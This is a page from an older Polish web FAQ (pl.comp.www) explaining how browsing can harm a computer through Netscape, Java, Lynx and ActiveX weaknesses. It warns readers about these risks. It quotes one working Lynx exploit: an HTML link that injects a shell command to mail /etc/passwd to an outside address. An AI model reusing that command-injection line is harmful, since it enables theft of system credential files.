pl.comp.www FAQ | ||||
---|---|---|---|---|
Następny | Następny rozdział | Rozdział 4. Wędrowanie po pajęczynie | Poprzedni rozdział | Poprzedni |
Czy przeglądając WWW mogę narazić się na zniszczenie zawartości dysku, bądź inną formę destabilizacji pracy komputera?
Niestety tak ;-(. A poważnie: o ile masz wyłączoną Java`ę, ActiveX, VBScript, JavaScript, pracujesz za dobrze skonfigurowanym firewallem (najlepiej pośredniczącym --- proxy, albo za filtrem pakietów z odrzucaniem połączeń ICMP, NetBIOS over TCP, RCP) i nie ładujesz plików z danymi zawierającymi makroinstrukcje, PostScript oraz programów --- prawdopodobnie nic się nie stanie. Tylko, że mało kto tak robi ;-).
W pozostałych wypadkach:
możliwość kasowania plików użytkowników z dysku (w wersjach 2.0 i 2.01 Netscape Navigatora) |
możliwość nadmiernego zużycia czasu procesora (efektem czego może być uniemożliwienie działania systemu) |
możliwość wykonania połączenia z dowolnym (nie zaś jedynie z tym z którego pobrano applet) hostem w sieci (co w połączeniu z relacjami zaufania z r-utills może być niebezpieczne dla całej organizacji |
potencjalna możliwość (usunięta po jdk 1.1.) przełamania przez bytecode restrykcji Java Security Managera |
Patrz też:.
Patrz też:.
Lynx:. istnieje coś takiego jak trusted hosts co pozwala wykonywać polecenia wydawane ze zdalnego komputera na lokalnym.
Poza tym możliwe jest (było do wersji 2.7.1 włącznie) manipulowanie częścią z typowych tylko dla tej przeglądarki URLi: <a href="LYNXDOWNLOAD://Method=-1/File=`mail%20crakers@org.com.pl%3C/etc/passwd`/SugFile=test"> CLICK HERE </a> próbuje (zwykle skutecznie) wysłać plik z hasłami z lokalnej maszyny na konto crakers@org.com.pl
ActiveX . nie posiada poza systemem podpisów pod kontrolkami żadnych mechanizmów zabezpieczających przed dostępem do danych na dysku. Twórca wrogiej kontrolki (którą nieświadomy niczego użytkownik zaakceptuje jako przydatną) jest w stanie zrobić niemal wszystko z naszym systemem. W obiegu jest kilka przykładów tej technologii: Exploder (podpisana, i certfikowana kontrolka, wykonująca zamknięcie systemu), czy wrogie , pochodzące z Computer Chaos Club z Hamburga (jedna z nich ,,dobierała się'' do składowanych na dysku danych programu do finansów osobistych Quicken
Patrz też:. http://www.ee.washington.edu/computing/iebug/
Patrz też:.
Następny | Spis treści | Poprzedni |
Praca off-line | Początek rozdziału | Prywatność w Pajęczynie |